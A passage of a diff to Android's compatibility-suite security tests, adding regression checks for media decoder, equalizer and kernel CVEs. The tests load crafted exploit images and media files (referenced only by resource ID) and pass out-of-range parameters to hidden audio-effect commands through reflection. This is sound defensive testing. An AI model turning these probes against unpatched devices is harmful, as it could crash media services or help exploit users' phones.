+ // capture data
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ VISUALIZER_CMD_CAPTURE,
+ new byte[0] /* command */, captureBuf /* reply */);
+ Log.d(TAG, "capture returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } finally {
+ if (audioEffect != null) {
+ audioEffect.release();
+ }
+ if (audioTrack != null) {
+ audioTrack.release();
+ }
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+ /**
+ * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+ *
+ * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+ * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+ */
+ public void test_android_bug_33251605() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
new file mode 100644
index 0000000..c844fbb
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -0,0 +1,339 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.media.audiofx.AudioEffect;
+import android.media.audiofx.Equalizer;
+import android.media.MediaPlayer;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.nio.charset.StandardCharsets;
+import java.util.Arrays;
+
+public class EffectBundleTest extends InstrumentationTestCase {
+ private static final String TAG = "EffectBundleTest";
+ private static final int[] INVALID_BAND_ARRAY = {Integer.MIN_VALUE, -10000, -100, -2, -1};
+ private static final int mValue0 = 9999; //unlikely values. Should not change
+ private static final int mValue1 = 13877;
+ private static final int PRESET_CUSTOM = -1; //keep in sync AudioEqualizer.h
+
+ private static final int MEDIA_SHORT = 0;
+ private static final int MEDIA_LONG = 1;
+
+ //Testing security bug: 32436341
+ public void testEqualizer_getParamCenterFreq() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_CENTER_FREQ, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32588352
+ public void testEqualizer_getParamCenterFreq_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_CENTER_FREQ, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32438598
+ public void testEqualizer_getParamBandLevel() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_BAND_LEVEL, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32584034
+ public void testEqualizer_getParamBandLevel_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_BAND_LEVEL, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32247948
+ public void testEqualizer_getParamFreqRange() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_BAND_FREQ_RANGE, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32588756
+ public void testEqualizer_getParamFreqRange_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_BAND_FREQ_RANGE, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32448258
+ public void testEqualizer_getParamPresetName() throws Exception {
+ testParamPresetName(MEDIA_SHORT);
+ }
+
+ //Testing security bug: 32588016
+ public void testEqualizer_getParamPresetName_long() throws Exception {
+ testParamPresetName(MEDIA_LONG);
+ }
+
+ private void testParamPresetName(int media) {
+ final int command = Equalizer.PARAM_GET_PRESET_NAME;
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ final byte testValue = 7;
+ byte reply[] = new byte[Equalizer.PARAM_STRING_SIZE_MAX];
+ Arrays.fill(reply, testValue);
+ if (!eqGetParam(media, command, invalidBand, reply)) {
+ fail("getParam PARAM_GET_PRESET_NAME did not complete successfully");
+ }
+ //Compare
+ if (invalidBand == PRESET_CUSTOM) {
+ final String expectedName = "Custom";
+ int length = 0;
+ while (reply[length] != 0) length++;
+ try {
+ final String presetName = new String(reply, 0, length,
+ StandardCharsets.ISO_8859_1.name());
+ assertEquals("getPresetName custom preset name failed", expectedName,
+ presetName);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem creating reply string.");
+ }
+ } else {
+ for (int i = 0; i < reply.length; i++) {
+ assertEquals(String.format("getParam should not change reply at byte %d", i),
+ testValue, reply[i]);
+ }
+ }
+ }
+ }
+
+ //testing security bug: 32095626
+ public void testEqualizer_setParamBandLevel() throws Exception {
+ final int command = Equalizer.PARAM_BAND_LEVEL;
+ short[] value = { 1000 };
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqSetParam(MEDIA_SHORT, command, invalidBand, value)) {
+ fail("setParam PARAM_BAND_LEVEL did not complete successfully");
+ }
+ }
+ }
+
+ //testing security bug: 32585400
+ public void testEqualizer_setParamBandLevel_long() throws Exception {
+ final int command = Equalizer.PARAM_BAND_LEVEL;
+ short[] value = { 1000 };
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqSetParam(MEDIA_LONG, command, invalidBand, value)) {
+ fail("setParam PARAM_BAND_LEVEL did not complete successfully");
+ }
+ }
+ }
+
+ //testing security bug: 32705438
+ public void testEqualizer_getParamFreqRangeCommand_short() throws Exception {
+ assertTrue("testEqualizer_getParamFreqRangeCommand_short did not complete successfully",
+ eqGetParamFreqRangeCommand(MEDIA_SHORT));
+ }
+
+ //testing security bug: 32703959
+ public void testEqualizer_getParamFreqRangeCommand_long() throws Exception {
+ assertTrue("testEqualizer_getParamFreqRangeCommand_long did not complete successfully",
+ eqGetParamFreqRangeCommand(MEDIA_LONG));
+ }
+
+ private boolean eqGetParamFreqRangeCommand(int media) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ short band = 2;
+ int intSize = 4; //bytes
+
+ //baseline
+ int cmdCode = 8; // EFFECT_CMD_GET_PARAM
+ byte command[] = concatArrays(/*status*/ intToByteArray(0),
+ /*psize*/ intToByteArray(2 * intSize),
+ /*vsize*/ intToByteArray(2 * intSize),
+ /*data[0]*/ intToByteArray(Equalizer.PARAM_BAND_FREQ_RANGE),
+ /*data[1]*/ intToByteArray((int) band));
+
+ byte reply[] = new byte[command.length];
+
+ AudioEffect af = eq;
+ Object o = AudioEffect.class.getDeclaredMethod("command", int.class, byte[].class,
+ byte[].class).invoke(af, cmdCode, command, reply);
+
+ int methodStatus = AudioEffect.ERROR;
+ if (o != null) {
+ methodStatus = Integer.valueOf(o.toString()).intValue();
+ }
+
+ assertTrue("Command expected to fail", methodStatus <= 0);
+ int sum = 0;
+ for (int i = 0; i < reply.length; i++) {
+ sum += Math.abs(reply[i]);
+ }
+
+ assertEquals("reply expected to be all zeros", sum, 0);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing eqGetParamFreqRangeCommand");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private boolean eqGetParam(int media, int command, int band, byte[] reply) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("getParameter", int[].class,
+ byte[].class).invoke(af, cmd, reply);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private boolean eqGetParam(int media, int command, int band, int[] reply) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("getParameter", int[].class,
+ int[].class).invoke(af, cmd, reply);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem getting parameter from equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private void testGetParam(int media, int command, int[] bandArray, int value0, int value1) {
+ int reply[] = {value0, value1};
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqGetParam(media, command, invalidBand, reply)) {
+ fail(String.format("getParam for command %d did not complete successfully",
+ command));
+ }
+ assertEquals("getParam should not change value0", value0, reply[0]);
+ assertEquals("getParam should not change value1", value1, reply[1]);
+ }
+ }
+
+ private boolean eqSetParam(int media, int command, int band, short[] value) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("setParameter", int[].class,
+ short[].class).invoke(af, cmd, value);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem setting parameter in equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private int getMediaId(int media) {
+ switch (media) {
+ default:
+ case MEDIA_SHORT:
+ return R.raw.good;
+ case MEDIA_LONG:
+ return R.raw.onekhzsine_90sec;
+ }
+ }
+
+ private static byte[] intToByteArray(int value) {
+ ByteBuffer converter = ByteBuffer.allocate(4);
+ converter.order(ByteOrder.nativeOrder());
+ converter.putInt(value);
+ return converter.array();
+ }
+
+ private static byte[] shortToByteArray(short value) {
+ ByteBuffer converter = ByteBuffer.allocate(2);
+ converter.order(ByteOrder.nativeOrder());
+ short sValue = (short) value;
+ converter.putShort(sValue);
+ return converter.array();
+ }
+
+ private static byte[] concatArrays(byte[]... arrays) {
+ int len = 0;
+ for (byte[] a : arrays) {
+ len += a.length;
+ }
+ byte[] b = new byte[len];
+
+ int offs = 0;
+ for (byte[] a : arrays) {
+ System.arraycopy(a, 0, b, offs, a.length);
+ offs += a.length;
+ }
+ return b;
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+ /**
+ * Verifies that decoding a particular GIF file does not read out out of bounds.
+ *
+ * The image has a color map of size 2, but states that pixels should come from values
+ * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+ * color map, which would be reading memory that we do not control, and may be uninitialized.
+ */
+ public void test_android_bug_33897722() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+ Movie movie = Movie.decodeStream(exploitImage);
+ assertNotNull(movie);
+ assertEquals(movie.width(), 600);
+ assertEquals(movie.height(), 752);
+
+ // The image has a 10 x 10 frame on top of a transparent background. Only test the
+ // 10 x 10 frame, since the original bug would never have used uninitialized memory
+ // outside of it.
+ Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+ Canvas canvas = new Canvas(bitmap);
+
+ // Use Src PorterDuff mode, to see exactly what the Movie creates.
+ Paint paint = new Paint();
+ paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+ movie.draw(canvas, 0, 0, paint);
+
+ for (int x = 0; x < 10; x++) {
+ for (int y = 0; y < 10; y++) {
+ assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+
import junit.framework.TestCase;
public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
System.loadLibrary("ctssecurity_jni");
}
+ @SecurityTest
public void testVroot() throws Exception {
assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
+ "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
+ "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
}
+ @SecurityTest
public void testPerfEvent() throws Exception {
assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
+ "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
doPerfEventTest());
}
+ @SecurityTest
public void testPerfEvent2() throws Exception {
assertTrue(doPerfEventTest2());
}
+ @SecurityTest
public void testFutex() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
+ "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
doFutexTest());
}
+ @SecurityTest
public void testNvmapIocFromId() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-5332. "
+ "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
doNvmapIocFromIdTest());
}
+ @SecurityTest
public void testPingPongRoot() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
+ "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
doPingPongRootTest());
}
+ @SecurityTest
public void testPipeReadV() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
+ " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
doPipeReadVTest());
}
+ @SecurityTest
public void testSysVipc() throws Exception {
assertTrue("Android does not support Sys V IPC, it must "
+ "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
*/
private static native boolean doVrootTest();
+ @SecurityTest
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 8f4b5d9..c481549 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2015 The Android Open Source Project
+ * Copyright (C) 2016 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -33,17 +33,22 @@
import android.media.MediaCodecList;
import android.media.MediaExtractor;
import android.media.MediaFormat;
+import android.media.MediaMetadataRetriever;
import android.media.MediaPlayer;
import android.opengl.GLES20;
import android.opengl.GLES11Ext;
import android.os.Looper;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
import android.util.Log;
import android.view.Surface;
+import android.webkit.cts.CtsTestServer;
import java.io.IOException;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
+import java.util.HashMap;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
@@ -62,121 +67,234 @@
public StagefrightTest() {
}
+ /***********************************************************
+ to prevent merge conflicts, add K tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ public void testStagefright_bug_35763994() throws Exception {
+ doStagefrightTest(R.raw.bug_35763994);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_33137046() throws Exception {
+ doStagefrightTest(R.raw.bug_33137046);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_2507() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2507);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_31647370() throws Exception {
+ doStagefrightTest(R.raw.bug_31647370);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32577290() throws Exception {
+ doStagefrightTest(R.raw.bug_32577290);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
+ @SecurityTest
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
+ @SecurityTest
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
+ @SecurityTest
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
+ @SecurityTest
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
+ @SecurityTest
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
+ @SecurityTest
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
+ @SecurityTest
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
+ @SecurityTest
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
+ @SecurityTest
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ }
+
+ /***********************************************************
+ to prevent merge conflicts, add M tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33818508() throws Exception {
+ doStagefrightTest(R.raw.bug_33818508);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32873375() throws Exception {
+ doStagefrightTest(R.raw.bug_32873375);
+ }
+
+ @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
+ @SecurityTest
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
+ @SecurityTest
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
+ @SecurityTest
+ public void testStagefright_bug_32322258() throws Exception {
+ doStagefrightTest(R.raw.bug_32322258);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
+ @SecurityTest
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
+ @SecurityTest
+ public void testStagefright_bug_32915871() throws Exception {
+ doStagefrightTest(R.raw.bug_32915871);
+ }
+
+ @SecurityTest
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
+ @SecurityTest
public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
+ @SecurityTest
public void testStagefright_cve_2016_3755() throws Exception {
doStagefrightTest(R.raw.cve_2016_3755);
}
+ @SecurityTest
public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
}
+ @SecurityTest
+ public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
+ doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
+ }
+
+ @SecurityTest
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
+ /***********************************************************
+ to prevent merge conflicts, add N tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_35467107() throws Exception {
+ doStagefrightTest(R.raw.bug_35467107);
+ }
+
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
+ doStagefrightTestMediaMetadataRetriever(rid);
+
+ Context context = getInstrumentation().getContext();
+ Resources resources = context.getResources();
+ CtsTestServer server = new CtsTestServer(context);
+ String rname = resources.getResourceEntryName(rid);
+ String url = server.getAssetUrl("raw/" + rname);
+ doStagefrightTestMediaPlayer(url);
+ doStagefrightTestMediaCodec(url);
+ doStagefrightTestMediaMetadataRetriever(url);
+ server.shutdown();
}
private Surface getDummySurface() {
@@ -276,13 +394,32 @@
}
private void doStagefrightTestMediaPlayer(final int rid) throws Exception {
+ doStagefrightTestMediaPlayer(rid, null);
+ }
- String name = getInstrumentation().getContext().getResources().getResourceEntryName(rid);
+ private void doStagefrightTestMediaPlayer(final String url) throws Exception {
+ doStagefrightTestMediaPlayer(-1, url);
+ }
+
+ private void closeQuietly(AutoCloseable closeable) {
+ if (closeable != null) {
+ try {
+ closeable.close();
+ } catch (RuntimeException rethrown) {
+ throw rethrown;
+ } catch (Exception ignored) {
+ }
+ }
+ }
+
+ private void doStagefrightTestMediaPlayer(final int rid, final String uri) throws Exception {
+
+ String name = uri != null ? uri :
+ getInstrumentation().getContext().getResources().getResourceEntryName(rid);
Log.i(TAG, "start mediaplayer test for: " + name);
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
LooperThread t = new LooperThread(new Runnable() {
@Override
public void run() {
@@ -293,16 +430,23 @@
mp.setOnCompletionListener(mpcl);
Surface surface = getDummySurface();
mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
try {
- AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
- .openRawResourceFd(rid);
+ if (uri == null) {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(rid);
- mp.setDataSource(fd.getFileDescriptor(),
- fd.getStartOffset(),
- fd.getLength());
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ } else {
+ mp.setDataSource(uri);
+ }
mp.prepareAsync();
} catch (Exception e) {
+ } finally {
+ closeQuietly(fd);
}
Looper.loop();
@@ -319,6 +463,14 @@
}
private void doStagefrightTestMediaCodec(final int rid) throws Exception {
+ doStagefrightTestMediaCodec(rid, null);
+ }
+
+ private void doStagefrightTestMediaCodec(final String url) throws Exception {
+ doStagefrightTestMediaCodec(-1, url);
+ }
+
+ private void doStagefrightTestMediaCodec(final int rid, final String url) throws Exception {
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
@@ -337,6 +489,7 @@
mp.setDataSource(fd.getFileDescriptor(),
fd.getStartOffset(),
fd.getLength());
+ fd.close();
} catch (Exception e) {
// this is a known-good file, so no failure should occur
fail("setDataSource of known-good file failed");
@@ -356,16 +509,21 @@
}
Resources resources = getInstrumentation().getContext().getResources();
- AssetFileDescriptor fd = resources.openRawResourceFd(rid);
MediaExtractor ex = new MediaExtractor();
- try {
- ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
- } catch (IOException e) {
- // ignore
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ ex.setDataSource(url);
}
- MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
int numtracks = ex.getTrackCount();
- String rname = resources.getResourceEntryName(rid);
+ String rname = url != null ? url: resources.getResourceEntryName(rid);
Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
for (int t = 0; t < numtracks; t++) {
// find all the available decoders for this format
@@ -378,13 +536,15 @@
continue;
}
String mime = format.getString(MediaFormat.KEY_MIME);
- for (MediaCodecInfo info: codecList.getCodecInfos()) {
+ int numCodecs = MediaCodecList.getCodecCount();
+ for (int i = 0; i < numCodecs; i++) {
+ MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
if (info.isEncoder()) {
continue;
}
try {
MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
- if (caps != null && caps.isFormatSupported(format)) {
+ if (caps != null) {
matchingCodecs.add(info.getName());
}
} catch (IllegalArgumentException e) {
@@ -405,16 +565,22 @@
if (mime.startsWith("video/")) {
surface = getDummySurface();
}
- codec.configure(format, surface, null, 0);
- codec.start();
+ try {
+ codec.configure(format, surface, null, 0);
+ codec.start();
+ } catch (Exception e) {
+ Log.i(TAG, "Failed to start/configure:", e);
+ }
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
+ ByteBuffer [] inputBuffers = codec.getInputBuffers();
while (true) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
+ ex.getCachedDuration();
int bufidx = codec.dequeueInputBuffer(5000);
if (bufidx >= 0) {
- int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
+ int n = ex.readSampleData(inputBuffers[bufidx], 0);
if (n < 0) {
flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
time = 0;
@@ -435,14 +601,8 @@
codec.releaseOutputBuffer(status, true);
}
}
- } catch (MediaCodec.CodecException ce) {
- if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
- // This indicates that the remote service is dead, suggesting a crash.
- throw new RuntimeException(ce);
- }
- // Other errors ignored.
- } catch (IllegalStateException ise) {
- // Other errors ignored.
+ } catch (Exception e) {
+ // local exceptions ignored, not security issues
} finally {
codec.release();
}
@@ -453,6 +613,81 @@
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
+ thr.join();
+ }
+ private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(rid, null);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(final String url) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(-1, url);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(
+ final int rid, final String url) throws Exception {
+
